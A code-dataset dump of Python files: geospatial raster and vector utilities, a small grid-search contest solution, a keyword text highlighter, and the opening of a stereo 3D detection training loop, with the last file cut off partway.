# Extracts contours from array, and converts each discrete\n # contour into a Shapely LineString feature. If the function\n # returns a KeyError, this may be due to an unresolved issue in\n # scikit-image: https://github.com/scikit-image/scikit-image/issues/4830\n # A temporary workaround is to peturb the z-value by a tiny\n # amount (1e-12) before using it to extract the contour.\n try:\n line_features = [\n LineString(i[:, [1, 0]])\n for i in find_contours(da_i.data, z_value)\n if i.shape[0] >= min_vertices\n ]\n except KeyError:\n line_features = [\n LineString(i[:, [1, 0]])\n for i in find_contours(da_i.data, z_value + 1e-12)\n if i.shape[0] >= min_vertices\n ]\n\n # Output resulting lines into a single combined MultiLineString\n return MultiLineString(line_features)\n\n def _time_format(i, time_format):\n \"\"\"\n Converts numpy.datetime64 into formatted strings;\n otherwise returns data as-is.\n \"\"\"\n if isinstance(i, np.datetime64):\n ts = pd.to_datetime(str(i))\n i = ts.strftime(time_format)\n return i\n\n # Verify input data is a xr.DataArray\n if not isinstance(da, xr.DataArray):\n raise ValueError(\n \"The input `da` is not an xarray.DataArray. 
\"\n \"If you supplied an xarray.Dataset, pass in one \"\n \"of its data variables using the syntax \"\n \"`da=ds.`.\"\n )\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # If z_values is supplied is not a list, convert to list:\n z_values = (\n z_values\n if (isinstance(z_values, list) or isinstance(z_values, np.ndarray))\n else [z_values]\n )\n\n # If dask collection, load into memory\n if dask.is_dask_collection(da):\n if verbose:\n print(f\"Loading data into memory using Dask\")\n da = da.compute()\n\n # Test number of dimensions in supplied data array\n if len(da.shape) == 2:\n if verbose:\n print(f\"Operating in multiple z-value, single array mode\")\n dim = \"z_value\"\n contour_arrays = {\n _time_format(i, time_format): _contours_to_multiline(da, i, min_vertices)\n for i in z_values\n }\n\n else:\n # Test if only a single z-value is given when operating in\n # single z-value, multiple arrays mode\n if verbose:\n print(f\"Operating in single z-value, multiple arrays mode\")\n if len(z_values) > 1:\n raise ValueError(\n \"Please provide a single z-value when operating \"\n \"in single z-value, multiple arrays mode\"\n )\n\n contour_arrays = {\n _time_format(i, time_format): _contours_to_multiline(\n da_i, z_values[0], min_vertices\n )\n for i, da_i in da.groupby(dim)\n }\n\n # If attributes are provided, add the contour keys to that dataframe\n if attribute_df is not None:\n try:\n attribute_df.insert(0, dim, contour_arrays.keys())\n\n # If this fails, it is due to the applied attribute table not\n # matching the structure of the loaded data\n except ValueError:\n if len(da.shape) == 2:\n raise ValueError(\n f\"The provided `attribute_df` contains a different \"\n f\"number of rows ({len(attribute_df.index)}) \"\n f\"than the number of supplied `z_values` \"\n f\"({len(z_values)}).\"\n )\n else:\n raise ValueError(\n f\"The provided `attribute_df` contains a different \"\n f\"number of rows ({len(attribute_df.index)}) \"\n f\"than the number of arrays along the '{dim}' \"\n f\"dimension ({len(da[dim])}).\"\n )\n\n # Otherwise, use the contour keys as the only main attributes\n else:\n attribute_df = list(contour_arrays.keys())\n\n # Convert output contours to a geopandas.GeoDataFrame\n contours_gdf = gpd.GeoDataFrame(\n data=attribute_df, geometry=list(contour_arrays.values()), crs=da.odc.crs\n )\n\n # Define affine and use to convert array coords to geographic coords.\n # We need to add 0.5 x pixel size to the x and y to obtain the centre\n # point of our pixels, rather than the top-left corner\n affine = da.odc.geobox.transform\n shapely_affine = [\n affine.a,\n affine.b,\n affine.d,\n affine.e,\n affine.xoff + affine.a / 2.0,\n affine.yoff + affine.e / 2.0,\n ]\n contours_gdf[\"geometry\"] = contours_gdf.affine_transform(shapely_affine)\n\n # Rename the data column to match the dimension\n contours_gdf = contours_gdf.rename({0: dim}, axis=1)\n\n # Drop empty timesteps\n empty_contours = contours_gdf.geometry.is_empty\n failed = \", \".join(map(str, contours_gdf[empty_contours][dim].to_list()))\n contours_gdf = contours_gdf[~empty_contours]\n\n # Raise exception if no data is returned, or if any contours fail\n # when `errors='raise'. 
Otherwise, print failed contours\n if empty_contours.all() and errors == \"raise\":\n raise ValueError(\n \"Failed to generate any valid contours; verify that \"\n \"values passed to `z_values` are valid and present \"\n \"in `da`\"\n )\n elif empty_contours.all() and errors == \"ignore\":\n if verbose:\n print(\n \"Failed to generate any valid contours; verify that \"\n \"values passed to `z_values` are valid and present \"\n \"in `da`\"\n )\n elif empty_contours.any() and errors == \"raise\":\n raise Exception(f\"Failed to generate contours: {failed}\")\n elif empty_contours.any() and errors == \"ignore\":\n if verbose:\n print(f\"Failed to generate contours: {failed}\")\n\n # If asked to write out file, test if GeoJSON or ESRI Shapefile. If\n # GeoJSON, convert to EPSG:4326 before exporting.\n if output_path and output_path.endswith(\".geojson\"):\n if verbose:\n print(f\"Writing contours to {output_path}\")\n contours_gdf.to_crs(\"EPSG:4326\").to_file(filename=output_path)\n\n if output_path and output_path.endswith(\".shp\"):\n if verbose:\n print(f\"Writing contours to {output_path}\")\n contours_gdf.to_file(filename=output_path)\n\n return contours_gdf\n\n\ndef interpolate_2d(\n ds, x_coords, y_coords, z_coords, method=\"linear\", factor=1, verbose=False, **kwargs\n):\n \"\"\"\n This function takes points with X, Y and Z coordinates, and\n interpolates Z-values across the extent of an existing xarray\n dataset. This can be useful for producing smooth surfaces from point\n data that can be compared directly against satellite data derived\n from an OpenDataCube query.\n\n Supported interpolation methods include 'linear', 'nearest' and\n 'cubic (using `scipy.interpolate.griddata`), and 'rbf' (using\n `scipy.interpolate.Rbf`).\n\n Last modified: February 2020\n\n Parameters\n ----------\n ds : xarray DataArray or Dataset\n A two-dimensional or multi-dimensional array from which x and y\n dimensions will be copied and used for the area in which to\n interpolate point data.\n x_coords, y_coords : numpy array\n Arrays containing X and Y coordinates for all points (e.g.\n longitudes and latitudes).\n z_coords : numpy array\n An array containing Z coordinates for all points (e.g.\n elevations). These are the values you wish to interpolate\n between.\n method : string, optional\n The method used to interpolate between point values. This string\n is either passed to `scipy.interpolate.griddata` (for 'linear',\n 'nearest' and 'cubic' methods), or used to specify Radial Basis\n Function interpolation using `scipy.interpolate.Rbf` ('rbf').\n Defaults to 'linear'.\n factor : int, optional\n An optional integer that can be used to subsample the spatial\n interpolation extent to obtain faster interpolation times, then\n up-sample this array back to the original dimensions of the\n data as a final step. For example, setting `factor=10` will\n interpolate data into a grid that has one tenth of the\n resolution of `ds`. This approach will be significantly faster\n than interpolating at full resolution, but will potentially\n produce less accurate or reliable results.\n verbose : bool, optional\n Print debugging messages. 
Default False.\n **kwargs :\n Optional keyword arguments to pass to either\n `scipy.interpolate.griddata` (if `method` is 'linear', 'nearest'\n or 'cubic'), or `scipy.interpolate.Rbf` (is `method` is 'rbf').\n\n Returns\n -------\n interp_2d_array : xarray DataArray\n An xarray DataArray containing with x and y coordinates copied\n from `ds_array`, and Z-values interpolated from the points data.\n \"\"\"\n\n # Extract xy and elev points\n points_xy = np.vstack([x_coords, y_coords]).T\n\n # Extract x and y coordinates to interpolate into.\n # If `factor` is greater than 1, the coordinates will be subsampled\n # for faster run-times. If the last x or y value in the subsampled\n # grid aren't the same as the last x or y values in the original\n # full resolution grid, add the final full resolution grid value to\n # ensure data is interpolated up to the very edge of the array\n if ds.x[::factor][-1].item() == ds.x[-1].item():\n x_grid_coords = ds.x[::factor].values\n else:\n x_grid_coords = ds.x[::factor].values.tolist() + [ds.x[-1].item()]\n\n if ds.y[::factor][-1].item() == ds.y[-1].item():\n y_grid_coords = ds.y[::factor].values\n else:\n y_grid_coords = ds.y[::factor].values.tolist() + [ds.y[-1].item()]\n\n # Create grid to interpolate into\n grid_y, grid_x = np.meshgrid(x_grid_coords, y_grid_coords)\n\n # Apply scipy.interpolate.griddata interpolation methods\n if method in (\"linear\", \"nearest\", \"cubic\"):\n # Interpolate x, y and z values\n interp_2d = scipy.interpolate.griddata(\n points=points_xy,\n values=z_coords,\n xi=(grid_y, grid_x),\n method=method,\n **kwargs,\n )\n\n # Apply Radial Basis Function interpolation\n elif method == \"rbf\":\n # Interpolate x, y and z values\n rbf = scipy.interpolate.Rbf(x_coords, y_coords, z_coords, **kwargs)\n interp_2d = rbf(grid_y, grid_x)\n\n # Create xarray dataarray from the data and resample to ds coords\n interp_2d_da = xr.DataArray(\n interp_2d, coords=[y_grid_coords, x_grid_coords], dims=[\"y\", \"x\"]\n )\n\n # If factor is greater than 1, resample the interpolated array to\n # match the input `ds` array\n if factor > 1:\n interp_2d_da = interp_2d_da.interp_like(ds)\n\n return interp_2d_da\n\n\ndef contours_to_arrays(gdf, col):\n \"\"\"\n This function converts a polyline shapefile into an array with three\n columns giving the X, Y and Z coordinates of each vertex. This data\n can then be used as an input to interpolation procedures (e.g. using\n a function like `interpolate_2d`.\n\n Last modified: October 2021\n\n Parameters\n ----------\n gdf : Geopandas GeoDataFrame\n A GeoPandas GeoDataFrame of lines to convert into point\n coordinates.\n col : str\n A string giving the name of the GeoDataFrame field to use as\n Z-values.\n\n Returns\n -------\n A numpy array with three columns giving the X, Y and Z coordinates\n of each vertex in the input GeoDataFrame.\n\n \"\"\"\n\n coords_zvals = []\n\n for i in range(0, len(gdf)):\n val = gdf.iloc[i][col]\n\n try:\n coords = np.concatenate(\n [np.vstack(x.coords.xy).T for x in gdf.iloc[i].geometry.geoms]\n )\n except:\n coords = np.vstack(gdf.iloc[i].geometry.coords.xy).T\n\n coords_zvals.append(\n np.column_stack((coords, np.full(np.shape(coords)[0], fill_value=val)))\n )\n\n return np.concatenate(coords_zvals)\n\n\ndef largest_region(bool_array, **kwargs):\n \"\"\"\n Takes a boolean array and identifies the largest contiguous region of\n connected True values. 
This is returned as a new array with cells in\n the largest region marked as True, and all other cells marked as False.\n\n Parameters\n ----------\n bool_array : boolean array\n A boolean array (numpy or xarray.DataArray) with True values for\n the areas that will be inspected to find the largest group of\n connected cells\n **kwargs :\n Optional keyword arguments to pass to `measure.label`\n\n Returns\n -------\n largest_region : boolean array\n A boolean array with cells in the largest region marked as True,\n and all other cells marked as False.\n\n \"\"\"\n\n # First, break boolean array into unique, discrete regions/blobs\n blobs_labels = label(bool_array, background=0, **kwargs)\n\n # Count the size of each blob, excluding the background class (0)\n ids, counts = np.unique(blobs_labels[blobs_labels > 0], return_counts=True)\n\n # Identify the region ID of the largest blob\n largest_region_id = ids[np.argmax(counts)]\n\n # Produce a boolean array where 1 == the largest region\n largest_region = blobs_labels == largest_region_id\n\n return largest_region\n\n\ndef transform_geojson_wgs_to_epsg(geojson, EPSG):\n \"\"\"\n Takes a geojson dictionary and converts it from WGS84 (EPSG:4326) to desired EPSG\n\n Parameters\n ----------\n geojson: dict\n a geojson dictionary containing a 'geometry' key, in WGS84 coordinates\n EPSG: int\n numeric code for the EPSG coordinate referecnce system to transform into\n\n Returns\n -------\n transformed_geojson: dict\n a geojson dictionary containing a 'coordinates' key, in the desired CRS\n\n \"\"\"\n gg = Geometry(geojson[\"geometry\"], CRS(\"epsg:4326\"))\n gg = gg.to_crs(CRS(f\"epsg:{EPSG}\"))\n return gg.__geo_interface__\n\n\ndef zonal_stats_parallel(shp, raster, statistics, out_shp, ncpus, **kwargs):\n \"\"\"\n Summarizing raster datasets based on vector geometries in parallel.\n Each cpu recieves an equal chunk of the dataset.\n Utilizes the perrygeo/rasterstats package.\n\n Parameters\n ----------\n shp : str\n Path to shapefile that contains polygons over\n which zonal statistics are calculated\n raster: str\n Path to the raster from which the statistics are calculated.\n This can be a virtual raster (.vrt).\n statistics: list\n list of statistics to calculate. 
e.g.\n ['min', 'max', 'median', 'majority', 'sum']\n out_shp: str\n Path to export shapefile containing zonal statistics.\n ncpus: int\n number of cores to parallelize the operations over.\n kwargs:\n Any other keyword arguments to rasterstats.zonal_stats()\n See https://github.com/perrygeo/python-rasterstats for\n all options\n\n Returns\n -------\n Exports a shapefile to disk containing the zonal statistics requested\n\n \"\"\"\n\n # yields n sized chunks from list l (used for splitting task to multiple processes)\n def chunks(l, n):\n for i in range(0, len(l), n):\n yield l[i : i + n]\n\n # calculates zonal stats and adds results to a dictionary\n def worker(z, raster, d):\n z_stats = zonal_stats(z, raster, stats=statistics, **kwargs)\n for i in range(0, len(z_stats)):\n d[z[i][\"id\"]] = z_stats[i]\n\n # write output polygon\n def write_output(zones, out_shp, d):\n # copy schema and crs from input and add new fields for each statistic\n schema = zones.schema.copy()\n crs = zones.crs\n for stat in statistics:\n schema[\"properties\"][stat] = \"float\"\n\n with fiona.open(out_shp, \"w\", \"ESRI Shapefile\", schema, crs) as output:\n for elem in zones:\n for stat in statistics:\n elem[\"properties\"][stat] = d[elem[\"id\"]][stat]\n output.write(\n {\n \"properties\": elem[\"properties\"],\n \"geometry\": mapping(shape(elem[\"geometry\"])),\n }\n )\n\n with fiona.open(shp) as zones:\n jobs = []\n\n # create manager dictionary (polygon ids=keys, stats=entries)\n # where multiple processes can write without conflicts\n man = mp.Manager()\n d = man.dict()\n\n # split zone polygons into 'ncpus' chunks for parallel processing\n # and call worker() for each\n split = chunks(zones, len(zones) // ncpus)\n for z in split:\n p = mp.Process(target=worker, args=(z, raster, d))\n p.start()\n jobs.append(p)\n\n # wait that all chunks are finished\n [j.join() for j in jobs]\n\n write_output(zones, out_shp, d)\n\n\ndef reverse_geocode(coords, site_classes=None, state_classes=None):\n \"\"\"\n Takes a latitude and longitude coordinate, and performs a reverse\n geocode to return a plain-text description of the location in the\n form:\n\n Site, State\n\n E.g.: `reverse_geocode(coords=(-35.282163, 149.128835))`\n\n 'Canberra, Australian Capital Territory'\n\n Parameters\n ----------\n coords : tuple of floats\n A tuple of (latitude, longitude) coordinates used to perform\n the reverse geocode.\n site_classes : list of strings, optional\n A list of strings used to define the site part of the plain\n text location description. Because the contents of the geocoded\n address can vary greatly depending on location, these strings\n are tested against the address one by one until a match is made.\n Defaults to: `['city', 'town', 'village', 'suburb', 'hamlet',\n 'county', 'municipality']`.\n state_classes : list of strings, optional\n A list of strings used to define the state part of the plain\n text location description. These strings are tested against the\n address one by one until a match is made. 
Defaults to:\n `['state', 'territory']`.\n\n Returns\n -------\n If a valid geocoded address is found, a plain text location\n description will be returned:\n\n 'Site, State'\n\n If no valid address is found, formatted coordinates will be returned\n instead:\n\n 'XX.XX S, XX.XX E'\n\n \"\"\"\n\n # Run reverse geocode using coordinates\n geocoder = Nominatim(user_agent=\"Digital Earth Australia\")\n\n # Create plain text-coords as fall-back\n lat = f\"{-coords[0]:.2f} S\" if coords[0] < 0 else f\"{coords[0]:.2f} N\"\n lon = f\"{-coords[1]:.2f} W\" if coords[1] < 0 else f\"{coords[1]:.2f} E\"\n\n try:\n # Get address from geocoded data\n out = geocoder.reverse(coords)\n address = out.raw[\"address\"]\n\n # Use site and state classes if supplied; else use defaults\n default_site_classes = [\n \"city\",\n \"town\",\n \"village\",\n \"suburb\",\n \"hamlet\",\n \"county\",\n \"municipality\",\n ]\n default_state_classes = [\"state\", \"territory\"]\n site_classes = site_classes if site_classes else default_site_classes\n state_classes = state_classes if state_classes else default_state_classes\n\n # Return the first site or state class that exists in address dict\n site = next((address[k] for k in site_classes if k in address), None)\n state = next((address[k] for k in state_classes if k in address), None)\n\n # If site and state exist in the data, return this.\n # Otherwise, return N/E/S/W coordinates.\n if site and state:\n # Return as site, state formatted string\n return f\"{site}, {state}\"\n\n else:\n # If no geocoding result, return N/E/S/W coordinates\n print(\"No valid geocoded location; returning coordinates instead\")\n return f\"{lat}, {lon}\"\n\n except (KeyError, AttributeError, GeocoderUnavailable, GeocoderServiceError):\n # If no geocoding result, return N/E/S/W coordinates\n print(\"No valid geocoded location; returning coordinates instead\")\n return f\"{lat}, {lon}\"\n\n\ndef hillshade(dem, elevation, azimuth, vert_exag=1, dx=30, dy=30):\n \"\"\"\n Calculate hillshade from an input Digital Elevation Model\n (DEM) array and a sun elevation and azimith.\n\n Parameters:\n -----------\n dem : numpy.array\n A 2D Digital Elevation Model array.\n elevation : int or float\n Sun elevation (0-90, degrees up from horizontal).\n azimith : int or float\n Sun azimuth (0-360, degrees clockwise from north).\n vert_exag : int or float, optional\n The amount to exaggerate the elevation values by\n when calculating illumination. This can be used either\n to correct for differences in units between the x-y coordinate\n system and the elevation coordinate system (e.g. decimal\n degrees vs. meters) or to exaggerate or de-emphasize\n topographic effects.\n dx : int or float, optional\n The x-spacing (columns) of the input DEM. This\n is typically the spatial resolution of the DEM.\n dy : int or float, optional\n The y-spacing (rows) of the input input DEM. 
This\n is typically the spatial resolution of the DEM.\n\n Returns:\n --------\n hs : numpy.array\n A 2D hillshade array with values between 0-1, where\n 0 is completely in shadow and 1 is completely\n illuminated.\n \"\"\"\n\n from matplotlib.colors import LightSource\n\n hs = LightSource(azdeg=azimuth, altdeg=elevation).hillshade(\n dem, vert_exag=vert_exag, dx=dx, dy=dy\n )\n return hs\n\n\ndef sun_angles(dc, query):\n \"\"\"\n For a given spatiotemporal query, calculate mean sun\n azimuth and elevation for each satellite observation, and\n return these as a new `xarray.Dataset` with 'sun_elevation'\n and 'sun_azimuth' variables.\n\n Parameters:\n -----------\n dc : datacube.Datacube object\n Datacube instance used to load data.\n query : dict\n A dictionary containing query parameters used to identify\n satellite observations and load metadata.\n\n Returns:\n --------\n sun_angles_ds : xarray.Dataset\n An `xarray.set` containing a 'sun_elevation' and\n 'sun_azimuth' variables.\n \"\"\"\n\n from datacube.api.query import query_group_by\n from datacube.model.utils import xr_apply\n\n # Identify satellite datasets and group outputs using the\n # same approach used to group satellite imagery (i.e. solar day)\n gb = query_group_by(**query)\n datasets = dc.find_datasets(**query)\n dataset_array = dc.group_datasets(datasets, gb)\n\n # Load and take the mean of metadata from each product\n sun_azimuth = xr_apply(\n dataset_array,\n lambda t, dd: np.mean([d.metadata.eo_sun_azimuth for d in dd]),\n dtype=float,\n )\n sun_elevation = xr_apply(\n dataset_array,\n lambda t, dd: np.mean([d.metadata.eo_sun_elevation for d in dd]),\n dtype=float,\n )\n\n # Combine into new xarray.Dataset\n sun_angles_ds = xr.merge(\n [sun_elevation.rename(\"sun_elevation\"), sun_azimuth.rename(\"sun_azimuth\")]\n )\n\n return sun_angles_ds\n","repo_name":"GeoscienceAustralia/dea-notebooks","sub_path":"Tools/dea_tools/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":37649,"program_lang":"python","lang":"en","doc_type":"code","stars":394,"dataset":"github-code","pt":"47"} +{"seq_id":"18890528845","text":"infile=open('surfin.txt','r').readlines()\r\noutfile=open('surfout.txt','w')\r\nr,c=map(int,infile[0].split())\r\nlines=[line.strip() for line in infile[1:]]\r\ngood=[(r-1,c-1)]\r\n\r\ndef checker1(square):\r\n row=square[0]\r\n col=square[1]\r\n if row>0 and lines[row-1][col]=='v':\r\n good.append((row-1,col))\r\ndef checker2(square):\r\n row=square[0]\r\n col=square[1]\r\n if col>0 and lines[row][col-1]=='>':\r\n good.append((row,col-1))\r\ncount=0\r\nwhile len(good)>0:\r\n square=good.pop()\r\n count+=1\r\n checker1(square)\r\n checker2(square)\r\n\r\noutfile.write(str(r*c-count))\r\noutfile.close()","repo_name":"eddiegz/Personal-C","sub_path":"AIO/crowd surfing/surfing dfs.py","file_name":"surfing dfs.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"74475219343","text":"import re\n\nDEFAULT_HIGHLIGHT_PRE = \"\"\nDEFAULT_HIGHLIGHT_POST = \"\"\n\nclass TextHighlighter(object):\n\n def __init__(self, max_ngram_size, highlight_pre = DEFAULT_HIGHLIGHT_PRE, highlight_post = DEFAULT_HIGHLIGHT_POST):\n \"\"\"\n TextHighlighter constructor. Define highlight text snippets\n\n :max_ngram_size - Specifies the maximum ngram size in the keywords. \n :highlight_pre – Specifies the text that should appear before a highlighted term.(e.g. ). 
It defaults to \n :highlight_post – Specifies the text that should appear after a highlighted term. (e.g. ). It defaults to \n \"\"\"\n\n self.highlight_pre = highlight_pre\n self.highlight_post = highlight_post\n self.max_ngram_size = max_ngram_size\n\n def highlight(self, text, keywords):\n \"\"\"\n Returns the highlighted text snippets of matching text in the original data\n \"\"\"\n\n n_text = ''\n # extract only the kw\n if(len(keywords) > 0):\n kw_list = keywords\n\n if(type(keywords[0]) == tuple):\n kw_list = [x[0] for x in keywords]\n\n text = text.strip()\n if self.max_ngram_size == 1:\n n_text = self.format_one_gram_text(text, kw_list)\n elif self.max_ngram_size > 1:\n n_text = self.format_n_gram_text(text, kw_list, self.max_ngram_size)\n\n return n_text\n\n def format_one_gram_text(self, text, relevant_words_array):\n text_tokens = text.replace('\\n',' ').split(' ')\n relevant_words_array = [kw.lower() for kw in relevant_words_array]\n try:\n for tk in range(len(text_tokens)):\n kw = re.sub('[!\",:.;?()]$|^[!\",:.;?()]|\\W[\"!,:.;?()]', '', text_tokens[tk])\n if kw.lower() in relevant_words_array:\n text_tokens[tk] = text_tokens[tk].replace(kw, self.highlight_pre + kw + self.highlight_post)\n except:\n pass\n new_text = ' '.join(text_tokens)\n return new_text\n\n def format_n_gram_text(self, text, relevant_words_array, n_gram):\n text_tokens = text.replace('\\n',' ').split(' ')\n relevant_words_array = [kw.lower() for kw in relevant_words_array]\n\n y = 0\n final_splited_text = []\n final_startends = []\n while y < len(text_tokens):\n #print(y)\n #print(final_splited_text)\n\n splited_n_gram_kw_list = []\n n_gram_kw_list = []\n n_gram_word_list, splited_n_gram_kw_list = self.find_more_relevant(y, text_tokens, n_gram, relevant_words_array, n_gram_kw_list, splited_n_gram_kw_list)\n if n_gram_word_list:\n\n if len(n_gram_word_list[0].split(' ')) == 1:\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, n_gram_word_list)\n final_splited_text.append(new_expression)\n else:\n kw_list = []\n splited_n_gram_kw_list = []\n splited_one = n_gram_word_list[0].split()\n\n for len_kw in range(0, len(splited_one)):\n kw_list, splited_n_gram_kw_list = self.find_more_relevant(y+len_kw, text_tokens, n_gram, relevant_words_array, kw_list, splited_n_gram_kw_list)\n min_score_word = min(kw_list, key=lambda x: relevant_words_array.index(x.lower()))\n\n if kw_list.index(min_score_word) == 0:\n term_list = [min_score_word]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n #print(text[startend[0]])\n #print(text[startend[1]])\n #print(txt)\n #print(startend)\n #print(new_expression)\n final_startends.append(startend)\n\n elif kw_list.index(min_score_word) >= 1:\n index_of_more_relevant = splited_n_gram_kw_list[0].index(min_score_word.split()[0])\n temporal_kw = ' '.join(splited_n_gram_kw_list[0][:index_of_more_relevant])\n if temporal_kw in relevant_words_array:\n try:\n if relevant_words_array.index(temporal_kw) > relevant_words_array.index(final_splited_text[-1] +' '+temporal_kw) and not re.findall(self.highlight_pre, final_splited_text[-1]):\n term_list = [final_splited_text[-1] +' '+temporal_kw]\n del final_splited_text[-1]\n y -= 1\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n final_splited_text.append(new_expression)\n else:\n term_list = [temporal_kw]\n y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n 
final_splited_text.append(new_expression)\n                            except:\n                                term_list = [temporal_kw]\n                                y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n                                final_splited_text.append(new_expression)\n\n                        else:\n                            for tmp_kw in splited_n_gram_kw_list[0][:index_of_more_relevant]:\n                                if tmp_kw in relevant_words_array:\n                                    term_list = [tmp_kw]\n                                    y, new_expression, txt, startend = self.replace_token(text_tokens, y, term_list)\n                                    final_splited_text.append(new_expression)\n                                else:\n                                    final_splited_text.append(text_tokens[y])\n                                    y += 1\n\n            else:\n                final_splited_text.append(text_tokens[y])\n                y += 1\n        new_text = ' '.join(final_splited_text)\n\n        return new_text, final_startends\n\n\n    def find_more_relevant(self, y, text_tokens, n_gram, relevant_words_array, kw_list, splited_n_gram_word_list):\n        temporary_list = []\n        temporary_list_two = []\n        for i in range(n_gram):\n\n            temporary_list.append(text_tokens[y:y + i + 1])\n            k = re.sub('''[!\",:.;?()]$|^[!\",':.;?()]|\\W[\"!,:.;?()]''', '', ' '.join(temporary_list[i]))\n\n            if k.lower() in relevant_words_array:\n                temporary_list_two.append(k)\n\n        n_gram_word_list = sorted(temporary_list_two, key=lambda x: relevant_words_array.index(x.lower()))\n\n        try:\n            kw_list.append(n_gram_word_list[0])\n            splited_n_gram_word_list.append(n_gram_word_list[0].split())\n        except:\n            pass\n\n        return kw_list, splited_n_gram_word_list\n\n\n    def replace_token(self, text_tokens, y, n_gram_word_list):\n        txt = ' '.join(text_tokens[y:y + len(n_gram_word_list[0].split(' '))])\n        \n        start = self.find_start(text_tokens, n_gram_word_list)\n        end = self.find_end(text_tokens, n_gram_word_list, start)\n        startend = (start, end)\n\n        new_expression = txt.replace(re.sub('[!\",:.;?()]$|^[!\",:.;?()]|\\W[\"!,:.;?()]', '', txt), self.highlight_pre + n_gram_word_list[0] + self.highlight_post)\n        y += len(n_gram_word_list[0].split(' '))\n        return y, new_expression, txt, startend\n    \n    def find_start(self, text_tokens, n_gram_word_list):\n        count = 0\n        for i in text_tokens:\n            if count != 0:\n                count = count + 1 # space that was split off\n            if i != n_gram_word_list[0].split(' ')[0]:\n                for j in i:\n                    count = count + len(j)\n            else:\n                return count\n        return count\n    \n    def find_end(self, text_tokens, n_gram_word_list, start):\n        count = 0\n        for i in n_gram_word_list[0].split(' '):\n            if count != 0:\n                count = count + 1\n            count = count + len(i)\n        if start > 0:\n            return start + count - 1\n        else:\n            return start\n","repo_name":"MafaldaMatos/yake-spacy","sub_path":"build/lib/highlight.py","file_name":"highlight.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"34251927175","text":"import os\nimport tqdm\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport time\nimport shutil\n\nfrom lib.helpers.save_helper import get_checkpoint_state\nfrom lib.helpers.save_helper import load_checkpoint\nfrom lib.helpers.save_helper import save_checkpoint\nfrom torch.nn.utils import clip_grad_norm_\nfrom progress.bar import Bar\n\nfrom lib.helpers.decode_helper import extract_dets_from_stereo_outputs\nfrom lib.helpers.decode_helper import decode_detections\n\n\nclass AverageMeter(object):\n    \"\"\"Computes and stores the average and current value\"\"\"\n\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        if self.count > 0:\n            self.avg = self.sum / 
self.count\n\n\nclass Trainer(object):\n def __init__(self,\n cfg,\n model,\n optimizer,\n train_loader,\n test_loader,\n lr_scheduler,\n warmup_lr_scheduler,\n logger):\n self.cfg = cfg\n self.model = model\n self.optimizer = optimizer\n self.train_loader = train_loader\n self.test_loader = test_loader\n self.lr_scheduler = lr_scheduler\n self.warmup_lr_scheduler = warmup_lr_scheduler\n self.logger = logger\n self.epoch = 0\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.model = self.model.cuda()\n\n self.class_name = self.test_loader.dataset.class_name\n # loading pretrain/resume model\n if cfg.get('pretrain_model'):\n assert os.path.exists(cfg['pretrain_model'])\n load_checkpoint(model=self.model,\n optimizer=None,\n filename=cfg['pretrain_model'],\n map_location=self.device,\n logger=self.logger)\n\n if cfg.get('resume_model', None):\n assert os.path.exists(cfg['resume_model'])\n self.epoch = load_checkpoint(model=self.model,\n optimizer=self.optimizer,\n filename=cfg['resume_model'],\n map_location=self.device,\n logger=self.logger)\n self.lr_scheduler.last_epoch = self.epoch - 1\n\n # # DDP\n # self.model = torch.nn.parallel.DistributedDataParallel(\n # self.model, device_ids=[rank % torch.cuda.device_count()], find_unused_parameters=True)\n\n self.model = torch.nn.DataParallel(self.model).cuda()\n\n def train(self):\n start_epoch = self.epoch\n\n progress_bar = tqdm.tqdm(range(start_epoch, self.cfg['max_epoch']), dynamic_ncols=True, leave=True, desc='epochs')\n for epoch in range(start_epoch, self.cfg['max_epoch']):\n # reset random seed\n # ref: https://github.com/pytorch/pytorch/issues/5059\n np.random.seed(np.random.get_state()[1][0] + epoch)\n # train one epoch\n self.train_one_epoch()\n self.epoch += 1\n\n # update learning rate\n if self.warmup_lr_scheduler is not None and epoch < 5:\n self.warmup_lr_scheduler.step()\n else:\n self.lr_scheduler.step(self.epoch)\n\n\n #save trained model\n if (self.epoch % self.cfg['save_frequency']) == 0:\n os.makedirs('checkpoints', exist_ok=True)\n ckpt_name = os.path.join('checkpoints', 'checkpoint_epoch_%d' % self.epoch)\n save_checkpoint(get_checkpoint_state(self.model, self.optimizer, self.epoch), ckpt_name)\n\n if (self.epoch % self.cfg['eval_frequency']) == 0:\n self.inference()\n progress_bar.update()\n\n return None\n\n\n def train_one_epoch(self):\n self.model.train()\n loss_stats = ['seg_loss', 'offset2d_left_loss', 'offset2d_right_loss', 'size_2d_left_loss', 'width_right_loss']\n data_time, batch_time = AverageMeter(), AverageMeter()\n avg_loss_stats = {l: AverageMeter() for l in loss_stats}\n num_iters = len(self.train_loader)\n bar = Bar('{}/{}'.format(\"3D\", \"Stereo\"), max=num_iters)\n end = time.time()\n\n #progress_bar = tqdm.tqdm(total=len(self.train_loader), leave=(self.epoch+1 == self.cfg['max_epoch']), desc='iters')\n for batch_idx, inputs in enumerate(self.train_loader):\n for key, val in inputs.items():\n if not isinstance(val, np.ndarray):\n continue\n if key in ['frame_id', 'metadata', 'calib']:\n continue\n # TODO\n if key in ['left_img' , 'right_img']:\n inputs[key] = torch.from_numpy(val).float().cuda()\n #inputs[key] = kornia.image_to_tensor(val).float().cuda()\n elif key in ['image_shape']:\n inputs[key] = torch.from_numpy(val).int().cuda()\n else:\n inputs[key] = torch.from_numpy(val).float().cuda()\n\n # train one batch\n self.optimizer.zero_grad()\n ret_dict, tb_dict = self.model(inputs)\n\n 